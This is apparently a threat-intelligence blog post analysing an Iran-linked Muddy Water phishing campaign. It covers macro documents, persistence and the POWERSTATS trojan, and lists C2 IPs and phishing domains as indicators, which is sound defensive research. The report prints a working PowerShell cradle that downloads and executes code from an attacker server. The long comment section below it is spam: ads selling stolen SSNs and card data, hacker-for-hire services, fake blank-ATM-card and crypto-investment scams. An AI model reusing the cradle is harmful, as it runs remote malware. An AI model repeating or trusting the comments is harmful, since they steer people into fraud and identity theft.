Tuesday, January 7, 2020

Summer Mirage

Author: Danny Adamitis 

Overview

The Tailored Intelligence Team at Prevailion has uncovered new aspects of sophisticated campaigns that we associate with high confidence to the Muddy Water threat actors. Security researchers, such as FireEye, have stated Muddy Water’ activity was tied to a group with an Iran-nexus. We have dubbed this campaign “Summer Mirage,” and we assess that it is a continuation of activity previously reported campaign called “BlackWater”.

Prevailion uncovered two new malicious documents; one which discussed Stephen Moore’s appointment to the Federal Reserve, the second document discussed companies that extract and process crude oil. Both of these documents relied upon socially engineering their victims into enabling macros in order to infect the targeted workstation. Once macros were enabled, the threat actor-written code would attempt to obtain a trojan hosted on an adversarial payload command and control node. This was a fully functional remote access trojan, that would allow the threat actors to interact with the compromised workstation via the adversarial interactive command and control node. 


This activity shows an increased level of sophistication from related samples observed months prior. The threat actor added a persistence feature at the document level, in order to try and establish persistence on the workstation. One notable feature was that the macro was named “H-3 Airstrike,” which was likely a reference to a surprise air attack by the Iranian Air Force during the Iran–Iraq War, in which they destroyed Iraqi aircraft to include a new shipment of Mirage F1 planes. The threat actors also added some new features to the PowerShell based trojan called POWERSTATS, such as a secondary command and control server.

Through analysis of the interactive command and control node, Prevailion observed one domain that briefly resolved to a particular IP address. 91[.]132[.]139[.]196, before moving to a new command and control node that was used to harvest credentials. This brief overlap in IP addresses represents an operational mistake by the threat actor, allowing us to identify this credential-harvesting command and control node which hosted numerous typo-squatted domains that appeared to mimic login services. We assess with moderate confidence that these domains were used to harvest credentials from targeted accounts.  

While we acknowledge that these campaigns likely occurred during the summer of 2019; given the historical targeting trends combined with the subject matter of the two documents, we thought it prudent to report these findings. We suspect that previously compromised networks would be particularly vulnerable to attacks, as attempts to infiltrate new targets are likely going to be extremely difficult at a time of heightened awareness. This report documents the increased and unreported activity in the sector, and documenting their relevant TTPs to better inform security practitioners. We encourage at-risk organizations to update and properly configure end-point antivirus and email filters, as well as training employees not to enable macros on documents coming from untrusted sources.

Technical Details

Muddy Water draws inspiration from Washington

The Tailored Intelligence Team at Prevailion has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor Muddy Water, and these indicators are likely a continuation of the BlackWater campaign that was previously reported by Cisco Talos. Muddy Water has been active since at least November 2017 and these indicators revealed some of their latest tactics, techniques and procedures (TTPs). We suspect that these documents were sent to victims via phishing emails.

One previously unreported document, that had a creation date of April 23th, 2019 according to metadata, discussed “Stephen Moore, the economic advisor to the president Trump [of the United States] plans to nominate [Moore] to the federal reserve.” This date coincides with a New York Times article published April 23, 2019 that generated a flurry of headlines around Moore’s nomination and was the source of the text pasted into Muddy Water’s document.


Upon further analysis of this document, it contained a malicious macro named “BlackWater”. The macro was the same one previously reported and even referenced the same command and control node, hxxp://38[.]132[.]99[.]167/crf.txt. 

New Document targeting the Petroleum Vertical

In late June 2018, specifically the 25th based off document metadata, another document turned up that we associated with high confidence to this campaign named “letter.doc.” The verbiage appeared to target members of the oil and gas vertical.

Image of the trojanized document prior to enabling macros

Image of the trojanized document after macros were enabled

The document contained a macro named “H3OpAirStrike”. This could be a reference to the “H-3 airstrike” which was a surprise air attack by the Iranian Air Force during the Iran–Iraq War on 4 April 1981 against the airbases of the Iraqi Air Force at the H-3 Air Base in western Iraq. The Iranians claimed that they destroyed 48 Iraqi aircraft on the ground with no losses of their own. (link) One of the other variables was named “Mirage F1” which was the type of aircraft the Iraqi Air Force was using at the time of the H-3 airstrike. (link

Deobfsucated version of the H3AirStrike.bas macro

This second macro contains some new features that were not previously associated with this group. According to Microsoft documents, the H3AirStrike2.bas macro created a task that is scheduled to execute at a start boundary. This start boundary would be defined by the threat actors. The code ensured that the task would run, remain hidden, and run even if the machine is operating on battery power. This adversarial created task would be named “MSOfficeUpdate”.

Deobfsucated version of the H3AirStrike2.bas macro

Once the document’s macro was run it communicated with the adversarial command and control server located at hxxp://104[.]237[.]255[.]195/p.txt, in order to obtain the PowerShell payload.

$ErrorActionPreference='SilentlyContinue';function gtcr(){ try { $wecieoject = New-Object System.Net.WebClient; $wecieoject.Proxy = [System.Net.WebProxy]::GetDefaultProxy(); $wecieoject.UseDefaultCredentials=$true; $wecieoject.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$coreoet = $wecieoject.DownloadString("http://104.237.255.195/p.txt"); } catch { "WoW";sleep -s 60; gtcr;} iex($coreoet)} gtcr

PowerShell code run that would obtain the fully functional PowerShell Trojan

The PowerShell trojan was hosted on an adversarial controlled command and control node.
The threat actors also took additional steps to obfuscate the payload using an open-source framework called Invoke-obfuscation. This would likely complicate analysis of the sample,and decrease its discovery rate by endpoint detection.

Image of p.txt as it would appear when downloaded 

Image of p.txt once deobfuscated

Once the payload was deobfuscated, it was revealed to be the same PowerShell trojan, called POWERSTATS, that the group used in the early part of last year. In fact some of the variable names used such as HS, OA, OFN, UN, and PIA are even the same. Similar to the previous BlackWater campaign, the trojan would perform some host based enumeration and then append that data to a URL post request to the interactive command and control node. The host based information obtained was the:
      workstation’s name
      workstation’s Operating System Architecture
      workstation’s caption
      workstation’s domain
      workstaion’s username
      workstation’s public IP address
      workstation’s MD5 hash of the cryptographic service.
This could serve as a unique identifier in case a user has multiple workstations. There were also similarities in the structure of the URL request. The URL contained the same string “?rCecms=[macro name] format. For example:
"http://91.132.139.196/prxy.php?rCecms=H3OpAirStrike"

There were a few new features added to this PowerShell script from the previously reported version. The new trojan obtained the public IP address from ident.me. They also embedded a second command and control IP address, 194[.]187[.]249[.]78, further down in the script, files downloaded from this IP address would be placed in the Downloads folder.

Screenshot of the EXCcNANscr function, with the secondary C2

Once the files were downloaded the author added an easter egg comment to remind the operator to “!!Please Check if File is Available, Who Knows What the AV Will do!!”

Deobfuscated function DnLDFILE

Credential Harvesting Campaign 

Searching on passive DNS (pDNS) history associated with the interactive command and control  node at IP address 91[.]132[.]139[.]196, there was one domain, account-signin-secure[.]com, that resolved to this IP address for one day on April 17th, 2019. The following day, March 18th, that domain then moved to the IP address 91[.]132[.]139[.]194. Searching on pDNS records associated with the IP address 91[.]132[.]139[.]194 revealed the following typo-squatted domains.

Cluster 1 - Typo Squatted Domains 
Date 
Domain
IP Address 
2019-06-11
logind2-secure.tk
91.132.139.194
2019-04-25
accesemailaccount.tk
91.132.139.194
2019-04-23
reauth92-services.sytes.net
91.132.139.194
2019-04-22
roadtosultan1.org
91.132.139.194
2019-04-17
apikeyallervice.com
91.132.139.194
2019-04-20
apikeyallervice.business
91.132.139.194
2019-04-17
signin-secure.tk
91.132.139.194
2019-04-16
login-dc2-verifyaccounts.ga
91.132.139.194
2019-04-15
login-dc2-verifyaccounts.tk
91.132.139.194
2019-04-15
login-secure-account.cf
91.132.139.194
2019-04-15
login-secure-account.ml
91.132.139.194
2019-04-13
service0auht-center.ddns.net
91.132.139.194

Two URLs associated with aforementioned domains were; -hxxps://login-secure-account.ml/bocah/[email protected]&Account-Unlock&sessionsid=VCfwm6Qm0NN5Pj6hQS3sDjaTPwui5MsNeMXDyi2EHAFdVyxMVpOiIWqjF2bx1wQw0JZdegJimuwtF3C0oOCgzT9BfSKhuvySjlY4PNAqyRpT2pPQSNX&protocol=ssl
-hxxps://login-dc2-verifyaccounts.tk/Manages?abuse%40icloud_com%26stats%3Daccount_unlock%26sessionsid%3DhGGVkFA24EjQ83R85DKcfPN3tNlqqalwaFSarDV1dgd7lxkerGwD1T88pQRuJvyr1d9oGxBsORXnu7bYBwjavn%26protocol%3Dssl=

Based upon these URLs, we suspect that these domains were likely used in operations to harvest end-user credentials. Through analyzing domains associated with the IP address 91.132.139[.]194, we were able to discover one hostname, reauth92-services.sytes.net, and one domain, login-secure-account.ml, that overlapped with the IP address 91.132.139.159. This lead us to discover “Cluster 2” of typo-squatted domains. We associate cluster 2 to this same threat actor.

Cluster 2 - Typo Squatted Domains 
Date 
Domain 
IP address 
2019-04-18
loginaccounts.cf
91.132.139.159
2019-04-12
login-secure-account.gq
91.132.139.159
2019-06-29
login-accounts.gq
91.132.139.159
2019-04-14
accounts-login.ga
91.132.139.159
2019-04-11
reauth92-services.sytes.net
91.132.139.159
2019-04-11
login-secure-account.ml
91.132.139.159
2019-04-15
accounts-login.gq
91.132.139.159
2019-04-08
secure-login-accounts.gq
91.132.139.159
2019-04-16
accountslogin.ga
91.132.139.159

Indicators of Compromise

Sha256 Hashes
4d72dcd33379fe7a34f9618e692f659fa9d318ab623168cd351c18ca3a805af1
95c650a540ed5385bd1caff45ba06ff90dc0773d744efc4c2e4b29dda102fcce
F779ccc3da9d8c62a9596c3567b38cabfa1b1292129c1a77db67aaffb7828fe2
F327abed77b4b19b4471eaebf722295b8e50a47f36a4d7662cac91b1a622e64a

URLs
hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://104[.]237[.]255[.]195/p.txt
hxxp://91[.]132[.]139[.]196/prxy.php?rCecms=H3OpAirStrike
hxxp://194[.]187[.]249[.]78/

IPs
38[.]132[.]99[.]167
104[.]237[.]255[.]195
91[.]132[.]139[.]196
91[.]132[.]139[.]194
91[.]132[.]139[.]159
194[.]187[.]249[.]78

Domains
logind2-secure.tk
accesemailaccount.tk
reauth92-services.sytes.net
roadtosultan1.org
apikeyallervice.com
apikeyallervice.business
signin-secure.tk
login-dc2-verifyaccounts.ga
login-dc2-verifyaccounts.tk
login-secure-account.cf
login-secure-account.ml
Service0auht-center.ddns.net
loginaccounts.cf
login-secure-account.gq
login-accounts.gq
accounts-login.ga
login-secure-account.ml
accounts-login.gq
secure-login-accounts.gq
accountslogin.ga

41 comments:

  1. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
    Replies
    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      [email protected]

      Delete
    2. BTC hits a new bearish price as people increased their bids in hopes of making huge gain from the rise but as we can all see now the market is very unstable , the truth is that you can always make more profit from trading rather than just holding and waiting for the price of BTC to skyrocket . Indeed it's a tough decision for both old and newbies whose intentions are just to hold and sell but rather the potentials of trading Btc would allow you grow your Btc not minding the present price chart and also saving your ass from any future deep that may occur . I started trading with Btc  Crypto world  late last year and till date have made over 12.7 Btc even with the ups and downs since the journey . With btc crypto world help ,I no longer have to worry about the rise and dip of Bitcoin , you can easily get in contact on WHATSAPP :+ 1  920 306 4580 
       EMAIL         :  henymack373 @gmail. com for any Crypto related issues.







































































































      Delete
    3. ALL THANKS TO DOCTOR0LOVESPELL I have been in bondage ever since my ex leave for another woman, It was really hell for me and everybody told me to forget about him but i could not because i love him so much, Things get worse until my friend introduced me to this great spell caster Dr. 0love who have save so many life and relationships and i contacted him through his email [email protected] or whatsapp him on: +12017812375 i explain everything to him and he cast a spell for me immediately after 24 hours, everything turn around and my boyfriend came back to me on his knee begging for forgiveness that i am the one and only woman in his life now. i was surprise i have never seen such a miracle in my life. I am so thankful to this man and i will forever publish his name Dr 0love visit his FB page: https://www.facebook.com/Lovespellthatworkfastusa or view his website: https://doctor0lovespell.wordpress.com/

      Delete
    4. **SELLING SSN+DOB FULLZ**

      CONTACT
      Telegram > @leadsupplier
      ICQ > 752822040
      Email > [email protected]

      >>1$ each without DL/ID number
      >>2$ each with DL
      >>5$ each for premium (also included relative info)

      *Will reduce price if buying in bulk
      *Hope for a long term business

      FORMAT OF LEADS/FULLZ/PROS

      ->FULL NAME
      ->SSN
      ->DATE OF BIRTH
      ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
      ->COMPLETE ADDRESS
      ->PHONE NUMBER, EMAIL, I.P ADDRESS
      ->EMPLOYMENT DETAILS
      ->REALTIONSHIP DETAILS
      ->MORTGAGE INFO
      ->BANK ACCOUNT DETAILS

      >Fresh Leads for tax returns & w-2 form filling
      >Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY

      ''OTHER GADGETS PROVIDING''

      >SSN+DOB Fullz
      >CC with CVV
      >Photo ID's
      >Dead Fullz
      >Spamming Tutorials
      >Carding Tutorials
      >Hacking Tutorials
      >SMTP Linux Root
      >DUMPS with pins track 1 and 2
      >Sock Tools
      >Server I.P's
      >HQ Emails with passwords

      Email > [email protected]
      Telegram > @leadsupplier
      ICQ > 752822040

      THANK YOU

      Delete





  2. Hello World
    I’m hacker and Services provider
    interested in any thing i do fair deals.
    I will show you each and everything to start business
    also teaching Hacking / spamming short courses
    I have all tools that you need to spam

    .. Western Union transfer
    .. Credit cards
    .. Money adders
    .. Bill paying
    .. College fee
    .. Fake documents
    .. Grade change

    Contact:

    [email protected]


    ReplyDelete
  3. Postagem muito informativa! Há muitas informações aqui que podem ajudar qualquer empresa a iniciar uma campanha de rede social de sucesso. programa espiao Android

    ReplyDelete
  4. "I just couldn't leave your website before telling you that I truly enjoyed the top quality info you present to your visitors? Will be back again frequently to check up on new posts.

    " 토토사이트

    ReplyDelete
  5. Hello everyone, Are you looking for a professional trader, forex and binary manager who will help you trade and manager your account with good and massive amount of profit in return. you can contact MR. CARLOS ELLISON for your investment plan, for he helped me earned 12,000usd with little investment funds. Carlos Ellison you're the best trader I can recommend for anyone who wants to invest and trade with a genuine trader, he also helps in recovery of loss funds..you can contact him on his Email:
    [email protected]
    Via whatsapp: (+12166263236)
    Via Telegram : +12166263236

    I advice you shouldn't hesitate. He's great.

    ReplyDelete
  6. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & will give discounts to them.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores.

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    ->Bulk order will be preferable
    ->Minimum order 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states & zips
    ->You can demand for samples if you want to test
    ->Data will be given with in few mins after payment received
    ->Payment mode BTC, PAYPAL & PERFECT MONEY

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete

  7. BE SMART AND BECOME RICH IN LESS THAN 3DAYS It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine, anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you. For details on how to get yours today, email the hackers on :
    [email protected] Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good. Love you all . the email address again is
    [email protected]

    ReplyDelete
  8. PLEASE READ!!Hello Guys!!!I am Caro I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
  9. PLEASE READ!!Hello Guys!!!I am Caro I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
    Replies
    1. BTC hits a new bearish price as people increased their bids in hopes of making huge gain from the rise but as we can all see now the market is very unstable , the truth is that you can always make more profit from trading rather than just holding and waiting for the price of BTC to skyrocket . Indeed it's a tough decision for both old and newbies whose intentions are just to hold and sell but rather the potentials of trading Btc would allow you grow your Btc not minding the present price chart and also saving your ass from any future deep that may occur . I started trading with Btc  Crypto world  late last year and till date have made over 12.7 Btc even with the ups and downs since the journey . With btc crypto world help ,I no longer have to worry about the rise and dip of Bitcoin , you can easily get in contact on WHATSAPP :+ 1  920 306 4580 
       EMAIL         :  henymack373 @gmail. com for any Crypto related issues.





























































      Delete
  10. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & I will give discounts for bulk orders.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores
    >Bulk order will be preferable
    >Minimum order 20 leads/fullz
    >Hope for the long term business
    >You can asked for samples, specific states & zips (if needed)
    >Payment mode BTC, PAYPAL & PERFECT MONEY

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ''OTHER GADGETS PROVIDING''

    >SSN Fullz
    >Dead Fullz
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >USA emails with passwords (bulk order preferable)

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  11. Hello Guys!! I am Belinda I live in Chicago  USA I am very excited today and do not know where to start my testimony from. I was a poor woman with 3 kids and find it difficult to pay my bills and feed my kids.My husband left me and the kids for another woman and ever since then we were living in pain and hunger but just few days ago i came across a testimony of a man who got a Blank ATM Card from Mr.Alexander so i immediately contacted him for the same type of ATM card and i am very happy to announce to the world that i am living a fulfilled life. This Blank ATM Card can withdraw up to 10,000 dollars and more daily without you having any account with any Bank. I have been able to buy a house and start my own business with this Blank ATM Card. Are you poor and need help then contact him now. Mr.Alexander email address is [email protected]

    ReplyDelete
  12. PLEASE READ!!!
    Hello Everyone, I'm Lucy, 32 Years Old. I live in Virginia,USA. I'm a mother with 2 kids and I have to take care of everything after my husband died in a road accident. I was working as an accountant until i lost my job last year due to Covid-19, i had not paid my bills and my kids were scared of getting evicted from the house so one morning i was online trying to find a new job that i could work and get paid hourly then i came across Mr. Sebastian comments on how he helped many people get their blank ATM card that changed their life for good. I decided to contact Mr Sebastian for same blank ATM card since it was difficult for me to feed my kids and pay their bills i emailed him at ([email protected]) and they responded immediately i agreed to their terms and conditions and believe me to my greatest surprise i received my card in 2 days delivered by DHL and i went straight to the nearest atm machine i was able to withdraw $10,000 instantly with no trace of getting caught i was happy and now i have used the card to withdraw $100,000 and i keep renewing my card every time it expires.Thank you Sebastian if you need his help out there contact him now: [email protected]

    ReplyDelete
  13. PLEASE READ!!!
    Hello Everyone, I'm Lucy, 32 Years Old. I live in Virginia,USA. I'm a mother with 2 kids and I have to take care of everything after my husband died in a road accident. I was working as an accountant until i lost my job last year due to Covid-19, i had not paid my bills and my kids were scared of getting evicted from the house so one morning i was online trying to find a new job that i could work and get paid hourly then i came across Mr. Sebastian comments on how he helped many people get their blank ATM card that changed their life for good. I decided to contact Mr Sebastian for same blank ATM card since it was difficult for me to feed my kids and pay their bills i emailed him at ([email protected]) and they responded immediately i agreed to their terms and conditions and believe me to my greatest surprise i received my card in 2 days delivered by DHL and i went straight to the nearest atm machine i was able to withdraw $10,000 instantly with no trace of getting caught i was happy and now i have used the card to withdraw $100,000 and i keep renewing my card every time it expires.Thank you Sebastian if you need his help out there contact him now: [email protected]

    ReplyDelete
  14. GET RICH WITH BLANK ATM CARD ... Whatsapp: +18033921735

    I want to testify about Dark Web blank atm cards which can withdraw money from any atm machines around the world. I was very poor before and have no job. I saw so many testimony about how Dark Web hackers send them the atm blank card and use it to collect money in any atm machine and become rich. ( [email protected] )I email them also and they sent me the blank atm card. I have use it to get 90,000 dollars. withdraw the maximum of 5,000 USD daily. Dark Web is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of atm programmed card which runs in automatic mode.

    Email: [email protected]
    Text & Call or WhatsApp: +18033921735

    ReplyDelete
  15. GET RICH WITH BLANK ATM CARD ... Whatsapp: +18033921735

    I want to testify about Dark Web blank atm cards which can withdraw money from any atm machines around the world. I was very poor before and have no job. I saw so many testimony about how Dark Web hackers send them the atm blank card and use it to collect money in any atm machine and become rich. ( [email protected] )I email them also and they sent me the blank atm card. I have use it to get 90,000 dollars. withdraw the maximum of 5,000 USD daily. Dark Web is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of atm programmed card which runs in automatic mode.

    Email: [email protected]
    Text & Call or WhatsApp: +18033921735

    ReplyDelete
  16. Hello friends. I've been reluctant in purchasing this blank ATM card I heard about online because everything seems too good to be true, but I was convinced when my friend got the card from Sebastian hackers & we both confirmed it really works, without delay I gave it a go. Ever since then I've been withdrawing about $10,000 daily from the card without having any bank account and now I can say I'm rich because I keep renewing my card after 3 months and I also have my business and enough money for my family. So glad I gave it a try at last & this card has really changed my life financially without getting caught, its real & truly works though its illegal but made me rich!! If you need this card from real hackers then contact them today via their email address:[email protected]

    ReplyDelete
  17. Hello friends. I've been reluctant in purchasing this blank ATM card I heard about online because everything seems too good to be true, but I was convinced when my friend got the card from Sebastian hackers & we both confirmed it really works, without delay I gave it a go. Ever since then I've been withdrawing about $10,000 daily from the card without having any bank account and now I can say I'm rich because I keep renewing my card after 3 months and I also have my business and enough money for my family. So glad I gave it a try at last & this card has really changed my life financially without getting caught, its real & truly works though its illegal but made me rich!! If you need this card from real hackers then contact them today via their email address:[email protected]

    ReplyDelete
  18. Hello
    We are professional traders, earning on forex and binary for investors weekly, will love to tell you all more about our investment platform where you can invest funds as little as $200 and start earning $2500 weekly, alot of people has benefited from this investment offer before and during this convid-19 virus, if you passing through financial difficulties due to this coronavirus and you need help paying bills simply choose a suitable investment plan for yourself and start making profit weekly

    $500 to earn $5,000 in 7 days
    $1000 to earn $10000 in 7 days
    $5000 to earn $50000 in 7 days

    To Start your investment now contact Via whatsapp: (+12166263236)
    email: [email protected]

    ReplyDelete
  19. Are you interested in the service of a hacker to get into a phone, facebook account, snapchat, Instagram, yahoo, Whatsapp, get verified on any social network account, increase your followers by any amount, bank wire and bank transfer. Contact him on= [email protected] +12132951376(WHATSAPP)

    ReplyDelete
  20. I am Mrs. Hans Barbara from Leipzig Germany, I want to testify about Perfect Hidden Hacker blank atm cards which can withdraw money from any atm machine around the world. I was very poor before and have no job. I saw so many testimonies about how Perfect Hidden Hacker hackers send them the atm blank card and use it to collect money in any atm machine and become rich. I email them also and paid the charges and delivery cost, I was a bit scared that I won't get the card and my money won't be refunded back to me, to my greatest surprise, the ATM Card was sent to me,  I have used it to get 25,000 Euro already, the maximum daily limit of the ATM Card is 5,000euro. Perfect Hidden Hacker is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of an atm programmed card which runs in automatic mode. Contact them via Email:[email protected]     

    ReplyDelete
  21. ARE YOU IN NEED OF A PROFESSIONAL HACKER?(CATCHING A CHEATING SPOUSE, RECOVERY OF LOST FUNDS, WEBSITE HACK...)
    High prolific information and Priviledges comes rare as i would be sharing with you magnificent insight you wish you heard years before now. As it's been understood that what people don't see, they will never know. This post is definitely for those who are willing to turn their lives around for the better, either financial-wise, relationship-wise or businesses.
    Welcome to the CYBER DEMON hacking agency where every request on hacking related issues are met within a short period of time.
    If your shoe fits in any of the required services below, you will be assigned to a designated professional hacker who is systematically known for operating on a dark web V-link protocol.
    The manual Operation of this hackers is to potentially deploy a distinguished hacking techniques to penetrating computers and various type of database system to meet your request.
    Penetration of computing systems are achieved using core software tools like Ransomeware, SQL/Keylogger injection. botnet, trojan and DDOS attacks.
    Providing value added services to clients as a hacker has been our sustaining goal.
    Are you faced with cyber challenges like
    ?? Hacking into the mobile phone of a cheating spouse.? This type of hack helps you track every movement of your cheater as we are bent on helping you gain full remote access into the cheater's mobile phone using a Trojan breach cracking system to penetrate their social media platforms like Facebook, whatsapp, snapchat etc. This spy processing is used via an HDSI folder which synchronizes the target mobile operating system into a clone S-Drive unit.
    ??Recovery of lost funds:?It saddens our mind when client expresses annoyance or dissatisfaction of unethical behaviours of scammers. The cyber security technique used to retrieving back the victims stolen funds is the application of a diverse intercall XX breacher software enables you track the data location of a scammer. Extracting every informations on the con database, every requested information required by the Cyber demon would be used to tracking every transaction, time and location of the scammer using this systematic courier tracking base method.
    ??Credit Score Upgrade:?Due to our transformed changes on Equifax tracking , upgrading of credit score are backed by our cyber tech breaching licence, This hacking process drastically generates you an undestructive higher credit score which correlates to a higher level of creditworthiness. The time frame for upgrading a credit score requires eighteen(18) hours
    ??? BITCOIN GENERATOR:? (Higher job profile). This involves using the ANTPOOL Sysytem drifting a specialized hardware and software implementing tool in slot even-algorithms to incentivize more coins into your wallet which in turn generates more coins exponentially like a dream at specified intervals.
    The company is large enough to provide comprehensive range of services such as.
    • Email hacks??
    • Hacking of websites.??
    • Uber free payment hacks.??
    • website hack.??
    Our strength is based on the ability to help you fix cyber problems by bringing together active cyber hacking professionals in theCyber demon to work with.
    Contact: Cyberdemonhacker432(at)gmail • com.

    ReplyDelete
  22. BTC hits a new bearish price as people increased their bids in hopes of making huge gain from the rise but as we can all see now the market is very unstable , the truth is that you can always make more profit from trading rather than just holding and waiting for the price of BTC to skyrocket . Indeed it's a tough decision for both old and newbies whose intentions are just to hold and sell but rather the potentials of trading Btc would allow you grow your Btc not minding the present price chart and also saving your ass from any future deep that may occur . I started trading with Btc  Crypto world  late last year and till date have made over 12.7 Btc even with the ups and downs since the journey . With btc crypto world help ,I no longer have to worry about the rise and dip of Bitcoin , you can easily get in contact on WHATSAPP :+ 1  920 306 4580 
     EMAIL         :  henymack373 @gmail. com for any Crypto related issues.

    ReplyDelete
    Replies
    1. BTC hits a new bearish price as people increased their bids in hopes of making huge gain from the rise but as we can all see now the market is very unstable , the truth is that you can always make more profit from trading rather than just holding and waiting for the price of BTC to skyrocket . Indeed it's a tough decision for both old and newbies whose intentions are just to hold and sell but rather the potentials of trading Btc would allow you grow your Btc not minding the present price chart and also saving your ass from any future deep that may occur . I started trading with Btc  Crypto world  late last year and till date have made over 12.7 Btc even with the ups and downs since the journey . With btc crypto world help ,I no longer have to worry about the rise and dip of Bitcoin , you can easily get in contact on WHATSAPP :+ 1  920 306 4580 
       EMAIL         :  henymack373 @gmail. com for any Crypto related issues.


























































































































































































      Delete
